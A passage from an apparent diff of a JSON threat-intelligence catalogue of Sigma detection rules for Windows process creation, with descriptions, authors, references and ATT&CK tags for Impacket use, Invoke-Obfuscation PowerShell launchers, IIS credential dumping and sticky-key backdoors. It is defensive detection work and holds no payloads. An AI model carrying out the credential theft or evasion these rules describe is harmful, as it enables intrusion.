"creation_date": "2020/04/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_html_help_spawn.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/", + 
"https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_html_help_spawn.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.001", + "attack.t1218.010", + "attack.t1218.011", + "attack.execution", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1047", + "attack.t1566", + "attack.t1566.001", + "attack.initial_access", + "attack.t1218" + ] + }, + "uuid": "52cad028-0ff0-4854-8f67-d25dfcbc78b4", + "value": "HTML Help Shell Spawn" + }, + { + "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/10/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_hwp_exploits.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/", + "https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1", + "https://twitter.com/cyberwar_15/status/1187287262054076416", + "https://blog.alyac.co.kr/1901", + "https://en.wikipedia.org/wiki/Hangul_(word_processor)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hwp_exploits.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566.001", + "attack.execution", + "attack.t1203", + "attack.t1059.003", + "attack.g0032" + ] + }, + "uuid": "023394c4-29d5-46ab-92b8-6a534c6f447b", + "value": 
"Suspicious HWP Sub Processes" + }, + { + "description": "Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files", + "meta": { + "author": "frack113", + "creation_date": "2022/07/18", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_icacls_deny.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/1df999e6-1cb8-45e3-8b61-499d1b7d5a9b/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_icacls_deny.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.001" + ] + }, + "uuid": "4ae81040-fc1c-4249-bfa3-938d260214d9", + "value": "Use Icacls to Hide File to Everyone" + }, + { + "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_iis_connection_strings_decryption.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/microsoft-iis-connection-strings-decryption.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_connection_strings_decryption.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ] + }, + "uuid": "97dbf6e2-e436-44d8-abee-4261b24d3e41", + "value": "Microsoft IIS Connection Strings Decryption" + }, + { + "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)", + "meta": { + "author": "frack113", + "creation_date": 
"2022/01/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_iis_http_logging.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.002/T1562.002.md#atomic-test-1---disable-windows-iis-http-logging", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_http_logging.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ] + }, + "uuid": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", + "value": "Disable Windows IIS HTTP Logging" + }, + { + "description": "Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords", + "meta": { + "author": "Tim Rauch, Janantha Marasinghe", + "creation_date": "2022/11/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_iis_service_account_password_dumped.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/microsoft-iis-service-account-password-dumped.html", + "https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA", + "https://www.netspi.com/blog/technical/network-penetration-testing/decrypting-iis-passwords-to-break-out-of-the-dmz-part-2/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_service_account_password_dumped.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ] + }, + "uuid": "2d3cdeec-c0db-45b4-aa86-082f7eb75701", + "value": "Microsoft IIS Service Account Password Dumped" + }, + { + "description": "Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", + "meta": { + 
"author": "Nasreddine Bencherchali", + "creation_date": "2022/09/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_imaging_devices_unusual_parents.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_imaging_devices_unusual_parents.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution" + ] + }, + "uuid": "f11f2808-adb4-46c0-802a-8660db50fa99", + "value": "ImagingDevices Unusual Parent Or Child Processes" + }, + { + "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/07/24", + "falsepositive": [ + "Legitimate use of the impacket tools" + ], + "filename": "proc_creation_win_impacket_compiled_tools.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/ropnop/impacket_static_binaries/releases/tag/0.9.21-dev-binaries", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_impacket_compiled_tools.yml" + ], + "tags": [ + "attack.execution", + "attack.t1557.001" + ] + }, + "uuid": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", + "value": "Impacket Tool Execution" + }, + { + "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", + "meta": { + "author": "Ecco, oscd.community, Jonhnathan Ribeiro", + "creation_date": "2019/09/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_impacket_lateralization.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/wmiexec.py", + "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/atexec.py", + "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/smbexec.py", + "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/dcomexec.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_impacket_lateralization.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.003" + ] + }, + "uuid": "10c14723-61c7-4c75-92ca-9af245723ad2", + "value": "Impacket Lateralization Detection" + }, + { + "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/09", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_import_cert_susp_locations.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", + "https://docs.microsoft.com/en-us/powershell/module/pki/import-certificate?view=windowsserver2022-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_import_cert_susp_locations.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1553.004" + ] + }, + "uuid": "5f6a601c-2ecb-498b-9c33-660362323afa", + "value": "Root Certificate Installed From Susp Locations" + }, + { + "description": "Detect indirect command execution via Program Compatibility Assistant (pcalua.exe or forfiles.exe).", + "meta": { + "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts.", + "Legitimate usage of scripts." + ], + "filename": "proc_creation_win_indirect_cmd.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1202/T1202.md", + "https://eqllib.readthedocs.io/en/latest/analytics/884a7ccd-7305-4130-82d0-d4f90bc118b6.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_indirect_cmd.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "fa47597e-90e9-41cd-ab72-c3b74cfb0d02", + "value": "Indirect Command Execution" + }, + { + "description": "Detects the use of native Windows tool, forfiles to execute a file. 
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.", + "meta": { + "author": "Tim Rauch (rule), Elastic (idea)", + "creation_date": "2022/10/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_indirect_command_execution_forfiles.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-73d61931b2c77fde294189ce5d62323b416296a7c23ea98a608f425566538d1a", + "https://lolbas-project.github.io/lolbas/Binaries/Forfiles/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_indirect_command_execution_forfiles.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "a85cf4e3-56ee-4e79-adeb-789f8fb209a8", + "value": "Indirect Command Exectuion via Forfiles" + }, + { + "description": "Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.", + "meta": { + "author": "frack113", + "creation_date": "2021/07/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_infdefaultinstall.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md#atomic-test-4---infdefaultinstallexe-inf-execution", + "https://lolbas-project.github.io/lolbas/Binaries/Infdefaultinstall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_infdefaultinstall.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "ce7cf472-6fcc-490a-9481-3786840b5d9b", + "value": "InfDefaultInstall.exe .inf Execution" + }, + { + "description": "Detects encoded 
base64 MZ header in the commandline", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/12", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_inline_base64_mz_header.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_inline_base64_mz_header.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", + "value": "Base64 MZ Header In CommandLine" + }, + { + "description": "Detects the use of WinAPI Functions via the commandline as seen used by threat actors via the tool winapiexec", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_inline_win_api_access.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/m417z/status/1566674631788007425", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml" + ], + "tags": [ + "attack.execution", + "attack.t1106" + ] + }, + "uuid": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", + "value": "Accessing WinAPI Via CommandLine" + }, + { + "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", + "meta": { + "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", + "creation_date": "2019/09/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_install_reg_debugger_backdoor.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/", + "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_install_reg_debugger_backdoor.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.008" + ] + }, + "uuid": "ae215552-081e-44c7-805f-be16f975c8a2", + "value": "Suspicious Debugger Registration Cmdline" + }, + { + "description": "Detect an interactive AT job, which may be used as a form of privilege escalation.", + "meta": { + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Unlikely (at.exe deprecated as of Windows 8)" + ], + "filename": "proc_creation_win_interactive_at.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md", + "https://eqllib.readthedocs.io/en/latest/analytics/d8db43cf-ed52-4f5c-9fb3-c9a4b95a0b56.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_interactive_at.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1053.002" + ] + }, + "uuid": "60fc936d-2eb0-4543-8a13-911c750a1dfc", + "value": "Interactive AT Job" + }, + { + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_invoke_obfuscation_clip.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_clip.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "b222df08-0e07-11eb-adc1-0242ac120002", + "value": "Invoke-Obfuscation CLIP+ Launcher" + }, + { + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", + "meta": { + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "creation_date": "2019/11/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_invoke_obfuscation_obfuscated_iex_commandline.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_obfuscated_iex_commandline.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "4bf943c6-5146-4273-98dd-e958fd1e3abf", + "value": "Invoke-Obfuscation Obfuscated IEX Invocation" + }, + { + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_invoke_obfuscation_stdin.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_stdin.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + 
"attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "6c96fc76-0eb1-11eb-adc1-0242ac120002", + "value": "Invoke-Obfuscation STDIN+ Launcher" + }, + { + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_invoke_obfuscation_var.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_var.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "27aec9c9-dbb0-4939-8422-1742242471d0", + "value": "Invoke-Obfuscation VAR+ Launcher" + }, + { + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_invoke_obfuscation_via_compress.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_compress.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "7eedcc9d-9fdb-4d94-9c54-474e8affc0c7", + "value": "Invoke-Obfuscation COMPRESS OBFUSCATION" + }, + { + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": 
"proc_creation_win_invoke_obfuscation_via_rundll.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_rundll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "056a7ee1-4853-4e67-86a0-3fd9ceed7555", + "value": "Invoke-Obfuscation RUNDLL LAUNCHER" + }, + { + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_invoke_obfuscation_via_stdin.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_stdin.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "9c14c9fa-1a63-4a64-8e57-d19280559490", + "value": "Invoke-Obfuscation Via Stdin" + }, + { + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_invoke_obfuscation_via_use_clip.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_use_clip.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", 
+ "attack.t1059.001" + ] + }, + "uuid": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", + "value": "Invoke-Obfuscation Via Use Clip" + }, + { + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_invoke_obfuscation_via_use_mhsta.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_use_mhsta.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "ac20ae82-8758-4f38-958e-b44a3140ca88", + "value": "Invoke-Obfuscation Via Use MSHTA" + }, + { + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2019/10/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_invoke_obfuscation_via_use_rundll32.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_use_rundll32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "36c5146c-d127-4f85-8e21-01bf62355d5a", + "value": "Invoke-Obfuscation Via Use Rundll32" + }, + { + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_invoke_obfuscation_via_var.yml", + 
"level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_var.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "e9f55347-2928-4c06-88e5-1a7f8169942e", + "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION" + }, + { + "description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/10/08", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_iox.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/EddieIvan01/iox", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iox.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090" + ] + }, + "uuid": "d7654f02-e04b-4934-9838-65c46f187ebc", + "value": "IOX Tunneling Tool" + }, + { + "description": "Detect the use of Jlaive to execute assemblies in a copied PowerShell", + "meta": { + "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", + "creation_date": "2022/05/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_jlaive_batch_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://jstnk9.github.io/jstnk9/research/Jlaive-Antivirus-Evasion-Tool", + "https://github.com/ch2sh/Jlaive", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_jlaive_batch_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003" + ] + }, + "uuid": "0a99eb3e-1617-41bd-b095-13dc767f3def", + "value": "Jlaive Usage For 
Assembly Execution In-Memory" + }, + { + "description": "Detects the use of Ldifde.exe with specific command line arguments to potentially load an LDIF file containing HTTP-based arguments.\nLdifde.exe is present, by default, on domain controllers and only requires user-level authentication to execute.\n", + "meta": { + "author": "@gott_cyber", + "creation_date": "2022/09/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_ldifde_file_load.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/0gtweet/status/1564968845726580736", + "https://strontic.github.io/xcyclopedia/library/ldifde.exe-979DE101F5059CEC1D2C56967CA2BAC0.html", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ldifde_file_load.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105", + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "6f535e01-ca1f-40be-ab8d-45b19c0c8b7f", + "value": "Suspicious Ldifde Command Usage" + }, + { + "description": "Detects MSHTA.EXE spwaned by SVCHOST as seen in LethalHTA and described in report", + "meta": { + "author": "Markus Neis", + "creation_date": "2018/06/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lethalhta.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://codewhitesec.blogspot.com/2018/07/lethalhta.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lethalhta.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.005" + ] + }, + "uuid": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", + "value": "MSHTA Spwaned by SVCHOST" + }, + { + "description": "Local accounts, System Owner/User discovery using 
operating systems utilities", + "meta": { + "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": [ + "Legitimate administrator or user enumerates local users for legitimate reason" + ], + "filename": "proc_creation_win_local_system_owner_account_discovery.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_local_system_owner_account_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033", + "attack.t1087.001" + ] + }, + "uuid": "502b42de-4306-40b4-9596-6f590c81f073", + "value": "Local Accounts Discovery" + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/02/11", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_logmein.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_logmein.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "d85873ef-a0f8-4c48-a53a-6b621f11729d", + "value": "Use of LogMeIn Remote Access Software" + }, + { + "description": "Detects creation or execution of UserInitMprLogonScript persistence method", + "meta": { + "author": "Tom Ueltschi (@c_APT_ure), Tim Shelton", + "creation_date": "2019/01/12", + "falsepositive": [ + "Exclude legitimate logon scripts" + ], + "filename": "proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://attack.mitre.org/techniques/T1037/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml" + ], + "tags": [ + "attack.t1037.001", + "attack.persistence" + ] + }, + "uuid": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", + "value": "Logon Scripts (UserInitMprLogonScript)" + }, + { + "description": "This rule will monitor any office apps that spins up a new LOLBin process. 
